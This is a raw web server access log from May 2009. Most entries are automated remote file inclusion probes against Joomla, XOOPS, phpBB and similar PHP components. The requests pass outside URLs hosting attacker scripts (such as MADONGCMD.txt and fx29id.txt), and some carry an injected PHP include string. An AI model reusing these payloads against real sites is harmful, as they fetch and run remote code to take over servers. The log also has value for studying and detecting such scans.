72.52.255.82 - - [16/May/2009:01:02:27 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
220.181.7.97 - - [16/May/2009:01:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.52.255.82 - - [16/May/2009:01:02:51 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:02:51 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.144.106 - - [16/May/2009:01:03:01 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:03:05 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:01:03:09 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:01:03:10 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
69.172.92.14 - - [16/May/2009:01:03:11 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:03:11 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:03:12 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
123.125.64.38 - - [16/May/2009:01:03:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.106.135.14 - - [16/May/2009:01:03:35 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:03:37 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:03:37 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:01:03:37 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:03:38 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:03:38 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
72.52.255.82 - - [16/May/2009:01:04:16 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:04:16 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:04:36 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:04:36 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.30.79.49 - - [16/May/2009:01:04:42 -0400] "GET /logs/access_log.Q109051300 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.246.39.167 - - [16/May/2009:01:04:43 -0400] "GET /logs/access_log.Q109032800%20%20//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:04:50 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:04:50 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:04:50 -0400] "GET /logs/access_log.Q109020500%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:04:53 -0400] "GET /logs/access_log.Q108112900%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:05:00 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:05:00 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:05:00 -0400] "GET /logs/access_log.Q109020500%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:05:09 -0400] "GET /logs/access_log.Q108112900%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:01:05:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [16/May/2009:01:06:05 -0400] "GET /logs/access_log.Q108071500//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
85.214.86.93 - - [16/May/2009:01:06:10 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:06:10 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:06:10 -0400] "GET /logs/access_log.Q109041200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:01:06:37 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
72.52.255.82 - - [16/May/2009:01:06:43 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:06:43 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
87.106.135.14 - - [16/May/2009:01:06:59 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:07:04 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:07:04 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.26.5 - - [16/May/2009:01:07:07 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:01:07:07 -0400] "GET ///vwar/backup/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:01:07:07 -0400] "GET /logs/access_log.Q108090900///vwar/backup/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:07:09 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:07:09 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:07:09 -0400] "GET /logs/error_log.Q109042900%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:01:07:13 -0400] "GET /logs/access_log.Q108083000%20%20//components/errors.php?error=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.116.178.20 - - [16/May/2009:01:07:37 -0400] "GET /logs/access_log.Q108071500//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
72.30.79.49 - - [16/May/2009:01:07:39 -0400] "GET /logs/access_log.Q108093000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.255.82 - - [16/May/2009:01:07:48 -0400] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:07:48 -0400] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
88.84.128.40 - - [16/May/2009:01:07:49 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
84.92.197.113 - - [16/May/2009:01:08:21 -0400] "GET /logs/access_log.Q108110900%20%20//components/errors.php?error=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:01:08:27 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:01:08:27 -0400] "GET /logs/access_log.Q108112100%20%20//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:01:08:27 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:01:08:32 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:08:32 -0400] "GET //components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:08:32 -0400] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
193.221.119.126 - - [16/May/2009:01:08:45 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:01:08:45 -0400] "GET /logs/error_log.Q109042900%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:01:08:45 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:10:12 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:10:12 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.230.168 - - [16/May/2009:01:10:49 -0400] "GET /logs/error_log.Q109042900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:01:10:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:01:11:05 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:11:05 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
193.25.197.14 - - [16/May/2009:01:11:46 -0400] "GET /logs/error_log.Q108121900%20%20//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:11:48 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:11:48 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:12:21 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:12:21 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:12:41 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:12:41 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
210.240.12.4 - - [16/May/2009:01:12:45 -0400] "GET /logs/error_log.Q108081200//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:01:12:45 -0400] "GET //errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:01:12:45 -0400] "GET /logs/error_log.Q108051600//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:01:12:45 -0400] "GET /logs//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:01:12:48 -0400] "GET /logs/ HTTP/1.0" 200 1552 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.255.82 - - [16/May/2009:01:12:50 -0400] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:12:50 -0400] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
87.106.135.14 - - [16/May/2009:01:13:04 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:13:04 -0400] "GET //components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:13:04 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:13:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
87.106.135.14 - - [16/May/2009:01:13:04 -0400] "GET /logs//components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
210.240.12.4 - - [16/May/2009:01:13:08 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
210.240.12.4 - - [16/May/2009:01:13:08 -0400] "GET //include/write.php?dir=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
210.240.12.4 - - [16/May/2009:01:13:08 -0400] "GET /logs//include/write.php?dir=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
210.240.12.4 - - [16/May/2009:01:13:08 -0400] "GET /logs/access_log.Q109032000//include/write.php?dir=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:13:10 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:13:11 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:13:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:13:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.26.5 - - [16/May/2009:01:13:20 -0400] "GET /logs/access_log.Q108090900%20%20///vwar/backup/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.118.194.200 - - [16/May/2009:01:13:27 -0400] "GET /logs/access_log.Q108082500//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.118.194.200 - - [16/May/2009:01:13:28 -0400] "GET //?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
210.118.194.200 - - [16/May/2009:01:13:28 -0400] "GET /logs//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:01:13:49 -0400] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 211 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:01:13:49 -0400] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 216 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
87.106.135.14 - - [16/May/2009:01:13:53 -0400] "GET /logs/access_log.Q109013000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:13:53 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:13:53 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
200.32.100.130 - - [16/May/2009:01:14:00 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
200.32.100.130 - - [16/May/2009:01:14:00 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:01:14:02 -0400] "GET /logs/access_log.Q109013000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:14:02 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:14:03 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
